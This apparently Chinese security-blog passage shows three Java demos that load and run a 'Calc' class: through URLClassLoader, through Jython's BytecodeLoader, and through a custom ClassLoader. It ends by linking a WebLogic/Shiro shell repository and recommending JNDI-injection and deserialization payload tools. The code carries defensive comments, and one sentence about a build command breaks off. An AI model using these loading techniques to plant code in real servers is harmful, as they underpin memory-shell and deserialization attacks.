package org.chabug.loader;
import java.net.URL;
import java.net.URLClassLoader;
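/**
 * Loads one class from a jar through {@link URLClassLoader} and instantiates it.
 *
 * <p>Security note: loading and instantiating a class runs its static initializer and
 * constructor with the privileges of this JVM. The jar location is therefore a trust
 * boundary: it should be a fixed, access-controlled path (as the constant below is) and
 * never a value derived from request data, configuration an attacker can write, or a
 * remote URL without integrity verification.
 */
public class URLClassLoaderDemo {
    /**
     * Loads {@code org.chabug.demo.Calc} from the jar and creates one instance of it.
     *
     * @param args unused
     * @throws Exception if the URL is malformed, the class cannot be found in the jar, or
     *     the class cannot be instantiated (a constructor failure arrives wrapped in
     *     {@link java.lang.reflect.InvocationTargetException})
     */
    public static void main(String[] args) throws Exception {
        URL url = new URL("file:///d:/calc.jar");
        // URLClassLoader keeps the jar file open until it is closed; try-with-resources
        // releases the handle even when loading or instantiation throws.
        try (URLClassLoader ucl = new URLClassLoader(new URL[] {url})) {
            Class<?> aClass = ucl.loadClass("org.chabug.demo.Calc");
            // Class.newInstance() is deprecated and rethrows checked constructor
            // exceptions undeclared; go through the Constructor object instead.
            aClass.getDeclaredConstructor().newInstance();
        }
    }
}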
jar包制作命令为
package org.chabug.loader;
import org.python.util.PythonInterpreter;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
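/**
 * Defines and instantiates a class from raw bytes by passing them to Jython's
 * {@code BytecodeLoader} through an embedded {@link PythonInterpreter}.
 *
 * <p>Security note: here the class is defined by the script interpreter, not by a
 * {@code ClassLoader} call in this code. When auditing or monitoring an application for
 * dynamic code loading, an embedded script engine on the classpath has to be treated as
 * a class-definition path of its own, and script text must never be assembled from
 * untrusted input.
 */
public class BytecodeLoaderLoader {
    /**
     * Reads the compiled class file, renders its bytes as a Python list literal and asks
     * the interpreter to define and instantiate the class.
     *
     * @param args unused
     * @throws Exception if the class file cannot be read or the interpreter fails
     */
    public static void main(String[] args) throws Exception {
        String className = "org.chabug.demo.Calc";
        byte[] bytes = getBytesByFile("E:\\code\\java\\JavaSerialize\\target\\classes\\org\\chabug\\demo\\Calc.class");
        if (bytes == null) {
            // getBytesByFile reports failure as null; stop here instead of hitting a
            // NullPointerException in the loop below.
            throw new IllegalStateException("could not read class file for " + className);
        }

        // StringBuilder avoids the quadratic cost of += on a String inside the loop.
        // Each byte is written as its signed decimal value followed by a comma, which
        // is the same text the "%s%s" format produced.
        StringBuilder classBytes = new StringBuilder();
        for (byte b : bytes) {
            classBytes.append(b).append(',');
        }

        // The line breaks and the quotes around the class name must be escaped for this
        // literal to compile and for the generated script to be valid Python.
        String s = String.format("from org.python.core import BytecodeLoader;\n"
                + "from jarray import array\n"
                + "myList = [%s]\n"
                + "bb = array( myList, 'b')\n"
                + "BytecodeLoader.makeClass(\"%s\",None,bb).getConstructor([]).newInstance([]);", classBytes, className);

        // getConstructor() with no arguments selects the no-arg constructor without the
        // ambiguous varargs call that getConstructor(null) is.
        PythonInterpreter instance = PythonInterpreter.class.getConstructor().newInstance();
        instance.exec(s);
    }

    /**
     * Reads a whole file into memory.
     *
     * @param pathStr path of the file to read
     * @return the file content, or {@code null} if reading failed (the stack trace is
     *     printed); callers must check for {@code null}
     */
    public static byte[] getBytesByFile(String pathStr) {
        File file = new File(pathStr);
        // try-with-resources closes both streams on every path; the previous code left
        // the input stream open when read() threw.
        try (FileInputStream fis = new FileInputStream(file);
                ByteArrayOutputStream bos = new ByteArrayOutputStream(1000)) {
            byte[] b = new byte[1000];
            int n;
            while ((n = fis.read(b)) != -1) {
                bos.write(b, 0, n);
            }
            return bos.toByteArray();
        } catch (Exception e) {
            // Kept as best-effort: failure is reported through the null return value.
            e.printStackTrace();
        }
        return null;
    }
}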
三、自定义ClassLoader
package org.chabug.loader;
import static org.chabug.loader.BytecodeLoaderLoader.getBytesByFile;
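/**
 * A {@link ClassLoader} that defines one specific class from bytes read from disk.
 *
 * <p>Security note: {@code defineClass} turns a byte array into executable code. The
 * bytes must come from a trusted, integrity-checked source. {@link #className} and
 * {@link #bytes} are left public and mutable only to keep this class's existing
 * interface; in production code they should be private and final so that no other code
 * can replace the bytes before they are defined.
 */
public class MyLoader extends ClassLoader {
    /** Binary name of the only class this loader defines itself. */
    public static String className = "org.chabug.demo.Calc";

    /** Content of the class file, or {@code null} if it could not be read. */
    public static byte[] bytes = getBytesByFile("E:\\code\\java\\JavaSerialize\\target\\classes\\org\\chabug\\demo\\Calc.class");

    /**
     * Loads {@link #className} through a new {@code MyLoader} and instantiates it.
     *
     * @param args unused
     * @throws Exception if the class cannot be loaded or instantiated
     */
    public static void main(String[] args) throws Exception {
        // Class.newInstance() is deprecated; use the no-arg Constructor instead.
        new MyLoader().loadClass(className).getDeclaredConstructor().newInstance();
    }

    /**
     * Defines {@link #className} from {@link #bytes}; every other name is passed to the
     * superclass. {@code loadClass} calls this only after the parent loaders have failed
     * to find the class.
     *
     * @param name binary name of the requested class
     * @return the newly defined class
     * @throws ClassNotFoundException if the name is not {@link #className}, or if the
     *     class bytes could not be read
     */
    @Override
    public Class<?> findClass(String name) throws ClassNotFoundException {
        if (name.equals(className)) {
            if (bytes == null) {
                // The file read failed during static initialisation; report it as a
                // load failure rather than a NullPointerException on bytes.length.
                throw new ClassNotFoundException(name + ": class bytes could not be read");
            }
            return defineClass(className, bytes, 0, bytes.length);
        }
        return super.findClass(name);
    }
}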
四、原文链接
https://github.com/Y4er/WebLogic-Shiro-shell
五、相关推荐
JNDI-Injection-Exploit-Plus
是一款JNDI注入利用工具,可以生成JNDI链接并启动后端相关服务
是一款反序列化Payload生成工具(包含50+ Gadgets链,比ysoserial还多出10+)